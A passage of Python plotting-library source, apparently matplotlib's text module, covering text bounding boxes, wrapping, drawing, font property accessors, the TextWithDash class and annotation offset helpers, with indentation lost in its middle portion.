            bbox_transmuter = props.pop("bbox_transmuter", None)
            # Position/size here are placeholders; the real geometry is
            # computed from the rendered text in
            # update_bbox_position_size().
            self._bbox_patch = FancyBboxPatch(
                (0., 0.),
                1., 1.,
                boxstyle=boxstyle,
                bbox_transmuter=bbox_transmuter,
                transform=mtransforms.IdentityTransform(),
                **props)
        else:
            self._bbox_patch = None
        self._update_clip_properties()
def get_bbox_patch(self):
"""
Return the bbox Patch object. Returns None if the
FancyBboxPatch is not made.
"""
return self._bbox_patch
def update_bbox_position_size(self, renderer):
"""
Update the location and the size of the bbox. This method
should be used when the position and size of the bbox needs to
be updated before actually drawing the bbox.
"""
if self._bbox_patch:
trans = self.get_transform()
# don't use self.get_unitless_position here, which refers to text
# position in Text, and dash position in TextWithDash:
posx = float(self.convert_xunits(self._x))
posy = float(self.convert_yunits(self._y))
posx, posy = trans.transform_point((posx, posy))
x_box, y_box, w_box, h_box = _get_textbox(self, renderer)
self._bbox_patch.set_bounds(0., 0., w_box, h_box)
theta = np.deg2rad(self.get_rotation())
tr = mtransforms.Affine2D().rotate(theta)
tr = tr.translate(posx + x_box, posy + y_box)
self._bbox_patch.set_transform(tr)
fontsize_in_pixel = renderer.points_to_pixels(self.get_size())
self._bbox_patch.set_mutation_scale(fontsize_in_pixel)
def _draw_bbox(self, renderer, posx, posy):
""" Update the location and the size of the bbox
(FancyBboxPatch), and draw
"""
x_box, y_box, w_box, h_box = _get_textbox(self, renderer)
self._bbox_patch.set_bounds(0., 0., w_box, h_box)
theta = np.deg2rad(self.get_rotation())
tr = mtransforms.Affine2D().rotate(theta)
tr = tr.translate(posx + x_box, posy + y_box)
self._bbox_patch.set_transform(tr)
fontsize_in_pixel = renderer.points_to_pixels(self.get_size())
self._bbox_patch.set_mutation_scale(fontsize_in_pixel)
self._bbox_patch.draw(renderer)
def _update_clip_properties(self):
clipprops = dict(clip_box=self.clipbox,
clip_path=self._clippath,
clip_on=self._clipon)
if self._bbox_patch:
bbox = self._bbox_patch.update(clipprops)
def set_clip_box(self, clipbox):
"""
Set the artist's clip :class:`~matplotlib.transforms.Bbox`.
ACCEPTS: a :class:`matplotlib.transforms.Bbox` instance
"""
super(Text, self).set_clip_box(clipbox)
self._update_clip_properties()
def set_clip_path(self, path, transform=None):
"""
Set the artist's clip path, which may be:
* a :class:`~matplotlib.patches.Patch` (or subclass) instance
* a :class:`~matplotlib.path.Path` instance, in which case
an optional :class:`~matplotlib.transforms.Transform`
instance may be provided, which will be applied to the
path before using it for clipping.
* *None*, to remove the clipping path
For efficiency, if the path happens to be an axis-aligned
rectangle, this method will set the clipping box to the
corresponding rectangle and set the clipping path to *None*.
ACCEPTS: [ (:class:`~matplotlib.path.Path`,
:class:`~matplotlib.transforms.Transform`) |
:class:`~matplotlib.patches.Patch` | None ]
"""
super(Text, self).set_clip_path(path, transform)
self._update_clip_properties()
def set_clip_on(self, b):
"""
Set whether artist uses clipping.
When False artists will be visible out side of the axes which
can lead to unexpected results.
ACCEPTS: [True | False]
"""
super(Text, self).set_clip_on(b)
self._update_clip_properties()
def get_wrap(self):
"""
Returns the wrapping state for the text.
"""
return self._wrap
def set_wrap(self, wrap):
"""
Sets the wrapping state for the text.
"""
self._wrap = wrap
def _get_wrap_line_width(self):
"""
Returns the maximum line width for wrapping text based on the
current orientation.
"""
x0, y0 = self.get_transform().transform(self.get_position())
figure_box = self.get_figure().get_window_extent()
# Calculate available width based on text alignment
alignment = self.get_horizontalalignment()
self.set_rotation_mode('anchor')
rotation = self.get_rotation()
left = self._get_dist_to_box(rotation, x0, y0, figure_box)
right = self._get_dist_to_box(
(180 + rotation) % 360,
x0,
y0,
figure_box)
if alignment == 'left':
line_width = left
elif alignment == 'right':
line_width = right
else:
line_width = 2 * min(left, right)
return line_width
def _get_dist_to_box(self, rotation, x0, y0, figure_box):
"""
Returns the distance from the given points, to the boundaries
of a rotated box in pixels.
"""
if rotation > 270:
quad = rotation - 270
h1 = y0 / math.cos(math.radians(quad))
h2 = (figure_box.x1 - x0) / math.cos(math.radians(90 - quad))
elif rotation > 180:
quad = rotation - 180
h1 = x0 / math.cos(math.radians(quad))
h2 = y0 / math.cos(math.radians(90 - quad))
elif rotation > 90:
quad = rotation - 90
h1 = (figure_box.y1 - y0) / math.cos(math.radians(quad))
h2 = x0 / math.cos(math.radians(90 - quad))
else:
h1 = (figure_box.x1 - x0) / math.cos(math.radians(rotation))
h2 = (figure_box.y1 - y0) / math.cos(math.radians(90 - rotation))
return min(h1, h2)
def _get_rendered_text_width(self, text):
"""
Returns the width of a given text string, in pixels.
"""
w, h, d = self._renderer.get_text_width_height_descent(
text,
self.get_fontproperties(),
False)
return math.ceil(w)
    def _get_wrapped_text(self):
        """
        Return a copy of the text with new lines added, so that
        the text is wrapped relative to the parent figure.
        """
        # Not fit to handle breaking up latex syntax correctly, so
        # ignore latex for now.
        if self.get_usetex():
            return self.get_text()
        # Build the line incrementally, for a more accurate measure of length
        line_width = self._get_wrap_line_width()
        wrapped_str = ""
        line = ""
        for word in self.get_text().split(' '):
            # New lines in the user's test need to force a split, so that it's
            # not using the longest current line width in the line being built
            sub_words = word.split('\n')
            for i in range(len(sub_words)):
                # Measure the line with the candidate word appended (the
                # joining space is included in the measurement).
                current_width = self._get_rendered_text_width(
                    line + ' ' + sub_words[i])
                # Split long lines, and each newline found in the current word
                if current_width > line_width or i > 0:
                    wrapped_str += line + '\n'
                    line = ""
                if line == "":
                    line = sub_words[i]
                else:
                    line += ' ' + sub_words[i]
        return wrapped_str + line
@allow_rasterization
def draw(self, renderer):
"""
Draws the :class:`Text` object to the given *renderer*.
"""
if renderer is not None:
self._renderer = renderer
if not self.get_visible():
return
if self.get_text().strip() == '':
return
renderer.open_group('text', self.get_gid())
with _wrap_text(self) as textobj:
bbox, info, descent = textobj._get_layout(renderer)
trans = textobj.get_transform()
# don't use textobj.get_position here, which refers to text
# position in Text, and dash position in TextWithDash:
posx = float(textobj.convert_xunits(textobj._x))
posy = float(textobj.convert_yunits(textobj._y))
if not np.isfinite(posx) or not np.isfinite(posy):
raise ValueError("posx and posy should be finite values")
posx, posy = trans.transform_point((posx, posy))
canvasw, canvash = renderer.get_canvas_width_height()
# draw the FancyBboxPatch
if textobj._bbox_patch:
textobj._draw_bbox(renderer, posx, posy)
gc = renderer.new_gc()
gc.set_foreground(textobj.get_color())
gc.set_alpha(textobj.get_alpha())
gc.set_url(textobj._url)
textobj._set_gc_clip(gc)
angle = textobj.get_rotation()
for line, wh, x, y in info:
mtext = textobj if len(info) == 1 else None
x = x + posx
y = y + posy
if renderer.flipy():
y = canvash - y
clean_line, ismath = textobj.is_math_text(line,
self.get_usetex())
if textobj.get_path_effects():
from matplotlib.patheffects import PathEffectRenderer
textrenderer = PathEffectRenderer(
textobj.get_path_effects(), renderer)
else:
textrenderer = renderer
if textobj.get_usetex():
textrenderer.draw_tex(gc, x, y, clean_line,
textobj._fontproperties, angle,
mtext=mtext)
else:
textrenderer.draw_text(gc, x, y, clean_line,
textobj._fontproperties, angle,
ismath=ismath, mtext=mtext)
gc.restore()
renderer.close_group('text')
self.stale = False
def get_color(self):
"Return the color of the text"
return self._color
def get_fontproperties(self):
"Return the :class:`~font_manager.FontProperties` object"
return self._fontproperties
def get_font_properties(self):
'alias for get_fontproperties'
return self.get_fontproperties()
def get_family(self):
"Return the list of font families used for font lookup"
return self._fontproperties.get_family()
def get_fontfamily(self):
'alias for get_family'
return self.get_family()
def get_name(self):
"Return the font name as string"
return self._fontproperties.get_name()
def get_style(self):
"Return the font style as string"
return self._fontproperties.get_style()
def get_size(self):
"Return the font size as integer"
return self._fontproperties.get_size_in_points()
def get_variant(self):
"Return the font variant as a string"
return self._fontproperties.get_variant()
def get_fontvariant(self):
'alias for get_variant'
return self.get_variant()
def get_weight(self):
"Get the font weight as string or number"
return self._fontproperties.get_weight()
def get_fontname(self):
'alias for get_name'
return self.get_name()
def get_fontstyle(self):
'alias for get_style'
return self.get_style()
def get_fontsize(self):
'alias for get_size'
return self.get_size()
def get_fontweight(self):
'alias for get_weight'
return self.get_weight()
def get_stretch(self):
'Get the font stretch as a string or number'
return self._fontproperties.get_stretch()
def get_fontstretch(self):
'alias for get_stretch'
return self.get_stretch()
def get_ha(self):
'alias for get_horizontalalignment'
return self.get_horizontalalignment()
def get_horizontalalignment(self):
"""
Return the horizontal alignment as string. Will be one of
'left', 'center' or 'right'.
"""
return self._horizontalalignment
def get_unitless_position(self):
"Return the unitless position of the text as a tuple (*x*, *y*)"
# This will get the position with all unit information stripped away.
# This is here for convienience since it is done in several locations.
x = float(self.convert_xunits(self._x))
y = float(self.convert_yunits(self._y))
return x, y
def get_position(self):
"Return the position of the text as a tuple (*x*, *y*)"
# This should return the same data (possible unitized) as was
# specified with 'set_x' and 'set_y'.
return self._x, self._y
def get_prop_tup(self, renderer=None):
"""
Return a hashable tuple of properties.
Not intended to be human readable, but useful for backends who
want to cache derived information about text (e.g., layouts) and
need to know if the text has changed.
"""
x, y = self.get_unitless_position()
return (x, y, self.get_text(), self._color,
self._verticalalignment, self._horizontalalignment,
hash(self._fontproperties),
self._rotation, self._rotation_mode,
self.figure.dpi, id(renderer or self._renderer),
)
def get_text(self):
"Get the text as string"
return self._text
def get_va(self):
'alias for :meth:`getverticalalignment`'
return self.get_verticalalignment()
def get_verticalalignment(self):
"""
Return the vertical alignment as string. Will be one of
'top', 'center', 'bottom' or 'baseline'.
"""
return self._verticalalignment
def get_window_extent(self, renderer=None, dpi=None):
'''
Return a :class:`~matplotlib.transforms.Bbox` object bounding
the text, in display units.
In addition to being used internally, this is useful for
specifying clickable regions in a png file on a web page.
*renderer* defaults to the _renderer attribute of the text
object. This is not assigned until the first execution of
:meth:`draw`, so you must use this kwarg if you want
to call :meth:`get_window_extent` prior to the first
:meth:`draw`. For getting web page regions, it is
simpler to call the method after saving the figure.
*dpi* defaults to self.figure.dpi; the renderer dpi is
irrelevant. For the web application, if figure.dpi is not
the value used when saving the figure, then the value that
was used must be specified as the *dpi* argument.
'''
#return _unit_box
if not self.get_visible():
return Bbox.unit()
if dpi is not None:
dpi_orig = self.figure.dpi
self.figure.dpi = dpi
if self.get_text().strip() == '':
tx, ty = self._get_xy_display()
return Bbox.from_bounds(tx, ty, 0, 0)
if renderer is not None:
self._renderer = renderer
if self._renderer is None:
raise RuntimeError('Cannot get window extent w/o renderer')
bbox, info, descent = self._get_layout(self._renderer)
x, y = self.get_unitless_position()
x, y = self.get_transform().transform_point((x, y))
bbox = bbox.translated(x, y)
if dpi is not None:
self.figure.dpi = dpi_orig
return bbox
def set_backgroundcolor(self, color):
"""
Set the background color of the text by updating the bbox.
.. seealso::
:meth:`set_bbox`
To change the position of the bounding box.
ACCEPTS: any matplotlib color
"""
if self._bbox_patch is None:
self.set_bbox(dict(facecolor=color, edgecolor=color))
else:
self._bbox_patch.update(dict(facecolor=color))
self._update_clip_properties()
self.stale = True
def set_color(self, color):
"""
Set the foreground color of the text
ACCEPTS: any matplotlib color
"""
# Make sure it is hashable, or get_prop_tup will fail.
try:
hash(color)
except TypeError:
color = tuple(color)
self._color = color
self.stale = True
def set_ha(self, align):
'alias for set_horizontalalignment'
self.set_horizontalalignment(align)
def set_horizontalalignment(self, align):
"""
Set the horizontal alignment to one of
ACCEPTS: [ 'center' | 'right' | 'left' ]
"""
legal = ('center', 'right', 'left')
if align not in legal:
raise ValueError('Horizontal alignment must be one of %s' %
str(legal))
self._horizontalalignment = align
self.stale = True
def set_ma(self, align):
'alias for set_verticalalignment'
self.set_multialignment(align)
def set_multialignment(self, align):
"""
Set the alignment for multiple lines layout. The layout of the
bounding box of all the lines is determined bu the horizontalalignment
and verticalalignment properties, but the multiline text within that
box can be
ACCEPTS: ['left' | 'right' | 'center' ]
"""
legal = ('center', 'right', 'left')
if align not in legal:
raise ValueError('Horizontal alignment must be one of %s' %
str(legal))
self._multialignment = align
self.stale = True
def set_linespacing(self, spacing):
"""
Set the line spacing as a multiple of the font size.
Default is 1.2.
ACCEPTS: float (multiple of font size)
"""
self._linespacing = spacing
self.stale = True
def set_family(self, fontname):
"""
Set the font family. May be either a single string, or a list
of strings in decreasing priority. Each string may be either
a real font name or a generic font class name. If the latter,
the specific font names will be looked up in the
:file:`matplotlibrc` file.
ACCEPTS: [FONTNAME | 'serif' | 'sans-serif' | 'cursive' | 'fantasy' |
'monospace' ]
"""
self._fontproperties.set_family(fontname)
self.stale = True
def set_variant(self, variant):
"""
Set the font variant, either 'normal' or 'small-caps'.
ACCEPTS: [ 'normal' | 'small-caps' ]
"""
self._fontproperties.set_variant(variant)
self.stale = True
def set_fontvariant(self, variant):
'alias for set_variant'
return self.set_variant(variant)
def set_name(self, fontname):
"""alias for set_family"""
return self.set_family(fontname)
def set_fontname(self, fontname):
"""alias for set_family"""
self.set_family(fontname)
def set_style(self, fontstyle):
"""
Set the font style.
ACCEPTS: [ 'normal' | 'italic' | 'oblique']
"""
self._fontproperties.set_style(fontstyle)
self.stale = True
def set_fontstyle(self, fontstyle):
'alias for set_style'
return self.set_style(fontstyle)
def set_size(self, fontsize):
"""
Set the font size. May be either a size string, relative to
the default font size, or an absolute font size in points.
ACCEPTS: [size in points | 'xx-small' | 'x-small' | 'small' |
'medium' | 'large' | 'x-large' | 'xx-large' ]
"""
self._fontproperties.set_size(fontsize)
self.stale = True
def set_fontsize(self, fontsize):
'alias for set_size'
return self.set_size(fontsize)
def set_weight(self, weight):
"""
Set the font weight.
ACCEPTS: [a numeric value in range 0-1000 | 'ultralight' | 'light' |
'normal' | 'regular' | 'book' | 'medium' | 'roman' |
'semibold' | 'demibold' | 'demi' | 'bold' | 'heavy' |
'extra bold' | 'black' ]
"""
self._fontproperties.set_weight(weight)
self.stale = True
def set_fontweight(self, weight):
'alias for set_weight'
return self.set_weight(weight)
def set_stretch(self, stretch):
"""
Set the font stretch (horizontal condensation or expansion).
ACCEPTS: [a numeric value in range 0-1000 | 'ultra-condensed' |
'extra-condensed' | 'condensed' | 'semi-condensed' |
'normal' | 'semi-expanded' | 'expanded' | 'extra-expanded' |
'ultra-expanded' ]
"""
self._fontproperties.set_stretch(stretch)
self.stale = True
def set_fontstretch(self, stretch):
'alias for set_stretch'
return self.set_stretch(stretch)
def set_position(self, xy):
"""
Set the (*x*, *y*) position of the text
ACCEPTS: (x,y)
"""
self.set_x(xy[0])
self.set_y(xy[1])
def set_x(self, x):
"""
Set the *x* position of the text
ACCEPTS: float
"""
self._x = x
self.stale = True
def set_y(self, y):
"""
Set the *y* position of the text
ACCEPTS: float
"""
self._y = y
self.stale = True
def set_rotation(self, s):
"""
Set the rotation of the text
ACCEPTS: [ angle in degrees | 'vertical' | 'horizontal' ]
"""
self._rotation = s
self.stale = True
def set_va(self, align):
'alias for set_verticalalignment'
self.set_verticalalignment(align)
def set_verticalalignment(self, align):
"""
Set the vertical alignment
ACCEPTS: [ 'center' | 'top' | 'bottom' | 'baseline' ]
"""
legal = ('top', 'bottom', 'center', 'baseline')
if align not in legal:
raise ValueError('Vertical alignment must be one of %s' %
str(legal))
self._verticalalignment = align
self.stale = True
def set_text(self, s):
"""
Set the text string *s*
It may contain newlines (``\\n``) or math in LaTeX syntax.
ACCEPTS: string or anything printable with '%s' conversion.
"""
self._text = '%s' % (s,)
self.stale = True
@staticmethod
def is_math_text(s, usetex=None):
"""
Returns a cleaned string and a boolean flag.
The flag indicates if the given string *s* contains any mathtext,
determined by counting unescaped dollar signs. If no mathtext
is present, the cleaned string has its dollar signs unescaped.
If usetex is on, the flag always has the value "TeX".
"""
# Did we find an even number of non-escaped dollar signs?
# If so, treat is as math text.
if usetex is None:
usetex = rcParams['text.usetex']
if usetex:
if s == ' ':
s = r'\ '
return s, 'TeX'
if cbook.is_math_text(s):
return s, True
else:
return s.replace(r'\$', '$'), False
def set_fontproperties(self, fp):
"""
Set the font properties that control the text. *fp* must be a
:class:`matplotlib.font_manager.FontProperties` object.
ACCEPTS: a :class:`matplotlib.font_manager.FontProperties` instance
"""
if is_string_like(fp):
fp = FontProperties(fp)
self._fontproperties = fp.copy()
self.stale = True
def set_font_properties(self, fp):
'alias for set_fontproperties'
self.set_fontproperties(fp)
def set_usetex(self, usetex):
"""
Set this `Text` object to render using TeX (or not).
If `None` is given, the option will be reset to use the value of
`rcParams['text.usetex']`
"""
if usetex is None:
self._usetex = rcParams['text.usetex']
else:
self._usetex = bool(usetex)
self.stale = True
def get_usetex(self):
"""
Return whether this `Text` object will render using TeX.
If the user has not manually set this value, it will default to
the value of `rcParams['text.usetex']`
"""
if self._usetex is None:
return rcParams['text.usetex']
else:
return self._usetex
# Register Text's kwarg documentation for %(Text)s docstring interpolation
# and interpolate/dedent Text.__init__'s own docstring in place.
docstring.interpd.update(Text=artist.kwdoc(Text))
docstring.dedent_interpd(Text.__init__)
class TextWithDash(Text):
    """
    This is basically a :class:`~matplotlib.text.Text` with a dash
    (drawn with a :class:`~matplotlib.lines.Line2D`) before/after
    it. It is intended to be a drop-in replacement for
    :class:`~matplotlib.text.Text`, and should behave identically to
    it when *dashlength* = 0.0.
    The dash always comes between the point specified by
    :meth:`~matplotlib.text.Text.set_position` and the text. When a
    dash exists, the text alignment arguments (*horizontalalignment*,
    *verticalalignment*) are ignored.
    *dashlength* is the length of the dash in canvas units.
    (default = 0.0).
    *dashdirection* is one of 0 or 1, where 0 draws the dash after the
    text and 1 before. (default = 0).
    *dashrotation* specifies the rotation of the dash, and should
    generally stay *None*. In this case
    :meth:`~matplotlib.text.TextWithDash.get_dashrotation` returns
    :meth:`~matplotlib.text.Text.get_rotation`. (i.e., the dash takes
    its rotation from the text's rotation). Because the text center is
    projected onto the dash, major deviations in the rotation cause
    what may be considered visually unappealing results.
    (default = *None*)
    *dashpad* is a padding length to add (or subtract) space
    between the text and the dash, in canvas units.
    (default = 3)
    *dashpush* "pushes" the dash and text away from the point
    specified by :meth:`~matplotlib.text.Text.set_position` by the
    amount in canvas units. (default = 0)
    .. note::
        The alignment of the two objects is based on the bounding box
        of the :class:`~matplotlib.text.Text`, as obtained by
        :meth:`~matplotlib.artist.Artist.get_window_extent`. This, in
        turn, appears to depend on the font metrics as given by the
        rendering backend. Hence the quality of the "centering" of the
        label text with respect to the dash varies depending on the
        backend used.
    .. note::
        I'm not sure that I got the
        :meth:`~matplotlib.text.TextWithDash.get_window_extent` right,
        or whether that's sufficient for providing the object bounding
        box.
    """
    __name__ = 'textwithdash'
    def __str__(self):
        return "TextWithDash(%g,%g,%s)" % (self._x, self._y, repr(self._text))
    def __init__(self,
                 x=0, y=0, text='',
                 color=None,  # defaults to rc params
                 verticalalignment='center',
                 horizontalalignment='center',
                 multialignment=None,
                 fontproperties=None,  # defaults to FontProperties()
                 rotation=None,
                 linespacing=None,
                 dashlength=0.0,
                 dashdirection=0,
                 dashrotation=None,
                 dashpad=3,
                 dashpush=0,
                 ):
        Text.__init__(self, x=x, y=y, text=text, color=color,
                      verticalalignment=verticalalignment,
                      horizontalalignment=horizontalalignment,
                      multialignment=multialignment,
                      fontproperties=fontproperties,
                      rotation=rotation,
                      linespacing=linespacing)
        # The position (x,y) values for text and dashline
        # are bogus as given in the instantiation; they will
        # be set correctly by update_coords() in draw()
        self.dashline = Line2D(xdata=(x, x),
                               ydata=(y, y),
                               color='k',
                               linestyle='-')
        # The anchor point is stored in _dashx/_dashy (possibly unitized);
        # Text's _x/_y are recomputed from it in update_coords().
        self._dashx = float(x)
        self._dashy = float(y)
        self._dashlength = dashlength
        self._dashdirection = dashdirection
        self._dashrotation = dashrotation
        self._dashpad = dashpad
        self._dashpush = dashpush
        #self.set_bbox(dict(pad=0))
    def get_unitless_position(self):
        "Return the unitless position of the text as a tuple (*x*, *y*)"
        # This will get the position with all unit information stripped away.
        # This is here for convienience since it is done in several locations.
        x = float(self.convert_xunits(self._dashx))
        y = float(self.convert_yunits(self._dashy))
        return x, y
    def get_position(self):
        "Return the position of the text as a tuple (*x*, *y*)"
        # This should return the same data (possibly unitized) as was
        # specified with set_x and set_y
        return self._dashx, self._dashy
    def get_prop_tup(self, renderer=None):
        """
        Return a hashable tuple of properties.
        Not intended to be human readable, but useful for backends who
        want to cache derived information about text (e.g., layouts) and
        need to know if the text has changed.
        """
        # Extend Text's property tuple with the dash parameters so cached
        # layouts are invalidated whenever any of them change.
        props = [p for p in Text.get_prop_tup(self, renderer=renderer)]
        props.extend([self._x, self._y, self._dashlength,
                      self._dashdirection, self._dashrotation, self._dashpad,
                      self._dashpush])
        return tuple(props)
    def draw(self, renderer):
        """
        Draw the :class:`TextWithDash` object to the given *renderer*.
        """
        self.update_coords(renderer)
        Text.draw(self, renderer)
        if self.get_dashlength() > 0.0:
            self.dashline.draw(renderer)
        self.stale = False
    def update_coords(self, renderer):
        """
        Computes the actual *x*, *y* coordinates for text based on the
        input *x*, *y* and the *dashlength*. Since the rotation is
        with respect to the actual canvas's coordinates we need to map
        back and forth.
        """
        dashx, dashy = self.get_unitless_position()
        dashlength = self.get_dashlength()
        # Shortcircuit this process if we don't have a dash
        if dashlength == 0.0:
            self._x, self._y = dashx, dashy
            return
        dashrotation = self.get_dashrotation()
        dashdirection = self.get_dashdirection()
        dashpad = self.get_dashpad()
        dashpush = self.get_dashpush()
        # dashdirection == 1 contributes pi to theta, flipping the dash to
        # the opposite side of the anchor point.
        angle = get_rotation(dashrotation)
        theta = np.pi * (angle / 180.0 + dashdirection - 1)
        cos_theta, sin_theta = np.cos(theta), np.sin(theta)
        transform = self.get_transform()
        # Compute the dash end points
        # The 'c' prefix is for canvas coordinates
        cxy = transform.transform_point((dashx, dashy))
        cd = np.array([cos_theta, sin_theta])
        c1 = cxy + dashpush * cd
        c2 = cxy + (dashpush + dashlength) * cd
        inverse = transform.inverted()
        (x1, y1) = inverse.transform_point(tuple(c1))
        (x2, y2) = inverse.transform_point(tuple(c2))
        self.dashline.set_data((x1, x2), (y1, y2))
        # We now need to extend this vector out to
        # the center of the text area.
        # The basic problem here is that we're "rotating"
        # two separate objects but want it to appear as
        # if they're rotated together.
        # This is made non-trivial because of the
        # interaction between text rotation and alignment -
        # text alignment is based on the bbox after rotation.
        # We reset/force both alignments to 'center'
        # so we can do something relatively reasonable.
        # There's probably a better way to do this by
        # embedding all this in the object's transformations,
        # but I don't grok the transformation stuff
        # well enough yet.
        we = Text.get_window_extent(self, renderer=renderer)
        w, h = we.width, we.height
        # Watch for zeros
        if sin_theta == 0.0:
            dx = w
            dy = 0.0
        elif cos_theta == 0.0:
            dx = 0.0
            dy = h
        else:
            tan_theta = sin_theta / cos_theta
            dx = w
            dy = w * tan_theta
            if dy > h or dy < -h:
                dy = h
                dx = h / tan_theta
        # Half-extent of the text bbox along the dash direction, grown by
        # dashpad so there is a gap between dash end and text.
        cwd = np.array([dx, dy]) / 2
        cwd *= 1 + dashpad / np.sqrt(np.dot(cwd, cwd))
        cw = c2 + (dashdirection * 2 - 1) * cwd
        newx, newy = inverse.transform_point(tuple(cw))
        self._x, self._y = newx, newy
        # Now set the window extent
        # I'm not at all sure this is the right way to do this.
        we = Text.get_window_extent(self, renderer=renderer)
        self._twd_window_extent = we.frozen()
        self._twd_window_extent.update_from_data_xy(np.array([c1]), False)
        # Finally, make text align center
        Text.set_horizontalalignment(self, 'center')
        Text.set_verticalalignment(self, 'center')
    def get_window_extent(self, renderer=None):
        '''
        Return a :class:`~matplotlib.transforms.Bbox` object bounding
        the text, in display units.
        In addition to being used internally, this is useful for
        specifying clickable regions in a png file on a web page.
        *renderer* defaults to the _renderer attribute of the text
        object. This is not assigned until the first execution of
        :meth:`draw`, so you must use this kwarg if you want
        to call :meth:`get_window_extent` prior to the first
        :meth:`draw`. For getting web page regions, it is
        simpler to call the method after saving the figure.
        '''
        # NOTE(review): update_coords() forwards a possibly-None *renderer*
        # to Text.get_window_extent -- presumably relying on the _renderer
        # fallback described above; confirm before first draw.
        self.update_coords(renderer)
        if self.get_dashlength() == 0.0:
            return Text.get_window_extent(self, renderer=renderer)
        else:
            return self._twd_window_extent
    def get_dashlength(self):
        """
        Get the length of the dash.
        """
        return self._dashlength
    def set_dashlength(self, dl):
        """
        Set the length of the dash.
        ACCEPTS: float (canvas units)
        """
        self._dashlength = dl
        self.stale = True
    def get_dashdirection(self):
        """
        Get the direction dash. 1 is before the text and 0 is after.
        """
        return self._dashdirection
    def set_dashdirection(self, dd):
        """
        Set the direction of the dash following the text.
        1 is before the text and 0 is after. The default
        is 0, which is what you'd want for the typical
        case of ticks below and on the left of the figure.
        ACCEPTS: int (1 is before, 0 is after)
        """
        self._dashdirection = dd
        self.stale = True
    def get_dashrotation(self):
        """
        Get the rotation of the dash in degrees.
        """
        # Falls back to the text's own rotation when unset (see class doc).
        if self._dashrotation is None:
            return self.get_rotation()
        else:
            return self._dashrotation
    def set_dashrotation(self, dr):
        """
        Set the rotation of the dash, in degrees
        ACCEPTS: float (degrees)
        """
        self._dashrotation = dr
        self.stale = True
    def get_dashpad(self):
        """
        Get the extra spacing between the dash and the text, in canvas units.
        """
        return self._dashpad
    def set_dashpad(self, dp):
        """
        Set the "pad" of the TextWithDash, which is the extra spacing
        between the dash and the text, in canvas units.
        ACCEPTS: float (canvas units)
        """
        self._dashpad = dp
        self.stale = True
    def get_dashpush(self):
        """
        Get the extra spacing between the dash and the specified text
        position, in canvas units.
        """
        return self._dashpush
    def set_dashpush(self, dp):
        """
        Set the "push" of the TextWithDash, which
        is the extra spacing between the beginning
        of the dash and the specified position.
        ACCEPTS: float (canvas units)
        """
        self._dashpush = dp
        self.stale = True
    def set_position(self, xy):
        """
        Set the (*x*, *y*) position of the :class:`TextWithDash`.
        ACCEPTS: (x, y)
        """
        self.set_x(xy[0])
        self.set_y(xy[1])
    def set_x(self, x):
        """
        Set the *x* position of the :class:`TextWithDash`.
        ACCEPTS: float
        """
        self._dashx = float(x)
        self.stale = True
    def set_y(self, y):
        """
        Set the *y* position of the :class:`TextWithDash`.
        ACCEPTS: float
        """
        self._dashy = float(y)
        self.stale = True
    def set_transform(self, t):
        """
        Set the :class:`matplotlib.transforms.Transform` instance used
        by this artist.
        ACCEPTS: a :class:`matplotlib.transforms.Transform` instance
        """
        # Keep the dash line's transform in sync with the text's.
        Text.set_transform(self, t)
        self.dashline.set_transform(t)
        self.stale = True
    def get_figure(self):
        'return the figure instance the artist belongs to'
        return self.figure
    def set_figure(self, fig):
        """
        Set the figure instance the artist belong to.
        ACCEPTS: a :class:`matplotlib.figure.Figure` instance
        """
        # Propagate the figure to the dash line as well.
        Text.set_figure(self, fig)
        self.dashline.set_figure(fig)
docstring.interpd.update(TextWithDash=artist.kwdoc(TextWithDash))
class OffsetFrom(object):
    """
    Callable helper class for working with `Annotation`.

    Instances map a (x, y) offset, expressed in points or pixels, to
    screen coordinates relative to an artist, a bounding box, or a
    transform supplied at construction time.
    """
    def __init__(self, artist, ref_coord, unit="points"):
        '''
        Parameters
        ----------
        artist : `Artist`, `BboxBase`, or `Transform`
            The object to compute the offset from.
        ref_coord : length 2 sequence
            If *artist* is an `Artist` or `BboxBase`, this value is
            the location of the offset origin in fractions of the
            *artist* bounding box.
            If *artist* is a transform, the offset origin is the
            transform applied to this value.
        unit : {'points, 'pixels'}
            The screen units to use (pixels or points) for the offset
            input.
        '''
        self._artist = artist
        self._ref_coord = ref_coord
        self.set_unit(unit)
    def set_unit(self, unit):
        '''
        Set the unit for input to the transform used by ``__call__``.

        Parameters
        ----------
        unit : {'points', 'pixels'}
        '''
        if unit in ("points", "pixels"):
            self._unit = unit
        else:
            raise ValueError("'unit' must be one of [ 'points' | 'pixels' ]")
    def get_unit(self):
        '''Return the unit for input to the transform used by ``__call__``.'''
        return self._unit
    def _get_scale(self, renderer):
        '''Pixels per input unit for the currently configured unit.'''
        if self.get_unit() == "pixels":
            return 1.
        return renderer.points_to_pixels(1.)
    def __call__(self, renderer):
        '''
        Return the offset transform.

        Parameters
        ----------
        renderer : `RendererBase`
            The renderer to use to compute the offset

        Returns
        -------
        transform : `Transform`
            Maps (x, y) in pixel or point units to screen units
            relative to the given artist.
        '''
        ref = self._artist
        if isinstance(ref, Artist):
            bounds = ref.get_window_extent(renderer).bounds
        elif isinstance(ref, BboxBase):
            bounds = ref.bounds
        elif isinstance(ref, Transform):
            bounds = None
        else:
            raise RuntimeError("unknown type")
        if bounds is None:
            # A transform: the origin is the transformed reference point.
            x, y = ref.transform_point(self._ref_coord)
        else:
            # An artist/bbox: the origin is a fractional position in bounds.
            l, b, w, h = bounds
            xf, yf = self._ref_coord
            x, y = l + w * xf, b + h * yf
        sc = self._get_scale(renderer)
        return Affine2D().scale(sc, sc).translate(x, y)
class _AnnotationBase(object):
    """
    Mixin providing the coordinate-system machinery shared by annotation
    artists: resolving *xycoords*-style specifications to transforms,
    clipping control, and draggability.
    """
    def __init__(self,
                 xy,
                 xycoords='data',
                 annotation_clip=None):
        # xy: the annotated point, interpreted through xycoords.
        self.xy = xy
        self.xycoords = xycoords
        self.set_annotation_clip(annotation_clip)
        self._draggable = None
    def _get_xy(self, renderer, x, y, s):
        # Resolve (x, y) under coordinate spec *s* to display coordinates.
        # A tuple spec applies s1 to x and s2 to y independently.
        if isinstance(s, tuple):
            s1, s2 = s
        else:
            s1, s2 = s, s
        if s1 == 'data':
            x = float(self.convert_xunits(x))
        if s2 == 'data':
            y = float(self.convert_yunits(y))
        tr = self._get_xy_transform(renderer, s)
        x1, y1 = tr.transform_point((x, y))
        return x1, y1
    def _get_xy_transform(self, renderer, s):
        # Turn a coordinate spec *s* (string, tuple, callable, Artist,
        # BboxBase, or Transform) into a Transform to display coordinates.
        if isinstance(s, tuple):
            s1, s2 = s
            from matplotlib.transforms import blended_transform_factory
